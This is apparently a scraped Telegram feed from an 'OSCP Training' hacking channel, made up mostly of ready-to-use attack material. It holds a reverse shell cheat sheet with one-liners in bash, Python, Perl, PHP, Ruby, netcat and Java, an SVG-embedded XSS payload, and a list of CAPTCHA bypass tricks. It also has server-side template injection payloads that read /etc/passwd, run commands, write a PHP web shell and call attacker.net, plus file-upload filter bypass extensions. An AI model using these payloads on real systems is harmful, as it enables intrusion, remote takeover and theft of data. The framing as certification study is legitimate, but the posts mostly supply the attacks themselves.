🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Cisco Commands.pdf

9.5K views20:33

17.7K views19:47

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

https://t.me/PythonForCyberSecurity

11.3K views03:38

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Please open Telegram to view this post

VIEW IN TELEGRAM

10.1K views05:21

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Forwarded from TrazeR

Reverse Shell Cheat Sheet

Bash;

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Python;

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PERL;

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

PHP;

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby;

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat;

nc -e /bin/sh 10.0.0.1 1234

Java;

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

xterm;

xterm -display 10.0.0.1:1

14.5K views10:47

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Follow OSCP Training channel on WhatsApp: https://whatsapp.com/channel/0029VaDxObG17EmxK6bvmy3a

WhatsApp.com

OSCP Training | WhatsApp Channel

OSCP Training WhatsApp Channel. . 699 followers

14.6K viewsedited 17:02

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

🔥OSCP Training🔥🛡⚔️👨🏻‍💻 pinned «Follow OSCP Training channel on WhatsApp: https://whatsapp.com/channel/0029VaDxObG17EmxK6bvmy3a»

07:45

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings.

Many file uploads allow SVGs and are prone to tampering.

<svg width="600" height="400" xmlns="w3.org/2000/svg" xmlns:xhtml="w3.org/1999/xhtml">
<foreignObject width="100%" height="100%">
<body xmlns="w3.org/1999/xhtml">
<iframe src='javascript:confirm(10)'></iframe>
</body>
</foreignObject>
</svg>

15.0K views05:50

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Tryhackme.pdf

172.9 KB

Tryhackme.pdf

36.7K views02:18

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

CAPTCHA Bypass

* Send old captcha value.
* Send old captcha value with old session ID.
* Remove captcha with any adblocker and request again
* Bypass with OCR
* Response manipulation.
* Use any token with the same length(+1/-1).
* Remove the param value or remove the entire parameter.
* Change the method from POST to GET(or PUT) and remove the captcha.
* Change body to JSON or vice-versa.
* Check whether the value of the captcha is in the source code.
* Add headers:
X-Forwarded-Host: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1

13.3K views17:12

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

APIs Fuzzing for Bug Bounty.pdf

198.4 KB

APIs Fuzzing for Bug Bounty.pdf

9.1K views01:31

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Forwarded from Web Hacking

Google Dorks to Find Sensitive data or dir

7.9K views15:58

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Forwarded from Web Hacking

SSTI (Server Side Template Injection)

Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}

PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}

Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}

10.0K views06:42

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

0:06

This media is not supported in your browser

VIEW IN TELEGRAM

@OSCP_training

@WebHacking

10.6K views10:34

🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Forwarded from Web Hacking

File Upload Bypass -

Blacklisting Bypass
PHP → .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
ASP → .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp → .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion → .cfm, .cfml, .cfc, .dbm
Perl → .pl, .cgi
Using random capitalization → .pHp, .pHP5, .PhAr

Whitelisting Bypass
file.png.php
file.png.Php5
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg

13.9K views12:29